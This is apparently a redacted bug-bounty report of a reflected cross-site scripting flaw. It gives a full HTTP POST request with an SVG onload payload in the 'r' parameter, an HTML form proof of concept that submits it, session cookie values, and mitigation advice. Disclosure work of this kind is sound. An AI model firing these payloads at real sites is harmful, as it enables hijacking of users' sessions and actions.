RXSS on █████████

I found RXSS on https://███████/██████ ## Impact Perform any action within the application that the user can perform. View any information that the user is able to view. Modify any information that the user is able to modify. Initiate interactions with other application users, including malicious attacks, that will appear to originate from the initial victim user. ## System Host(s) ████ ## Affected Product(s) and Version(s) ## CVE Numbers ## Steps to Reproduce Inject payload `r={payload}` 1. Copy and paste on Burpsuite Repeater: ``` POST /███ HTTP/1.1 Host: ████████ Cookie: CFID=26233; CFTOKEN=90ba2403db7cf6d0-EA17C9CD-25F4-FB4C-2DEC8DEF637D9544; JSESSIONID=4837C2581F93ABB4DC8F719B2881FA98.cfusion; USAASCpersistence=184943114.20480.0000; TS0102adba=01dbba97f7cb238df71647f1b721444c13c907477d6bbbdab26080274d698141cbde7445d9eac690029443ecf71a098be9ddf1b4285cb4c9fdec0c2d52e8c64f27a783caa91d63c57bc0492f850ce173197907096e69fb1671e87db9318cbbea85dad29ef8ff28ef59a7467ca3f87758b8d9f1ce8c User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 63 Origin: https://██████████ Referer: https://████████/███████ Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers Connection: close r=%22><svG%20onLoad=alert(9)>&btnAction=I+understand+and+accept ``` 2. View the result: ███████ ████████ 3. You can use this code to test on html files : ``` <html> <body> <script>history.pushState('', '', '/')</script> <form action="https://█████/████" method="POST"> <input type="hidden" name="r" value="&quot;&gt;&lt;svG&#32;onLoad&#61;alert&#40;9&#41;&gt;" /> <input type="hidden" name="btnAction" value="I&#32;understand&#32;and&#32;accept" /> <input type="submit" value="Submit request" /> </form> </body> </html> ``` ## Suggested Mitigation/Remediation Actions Filter input on arrival Encode data on output Use appropriate response headers Content Security Policy.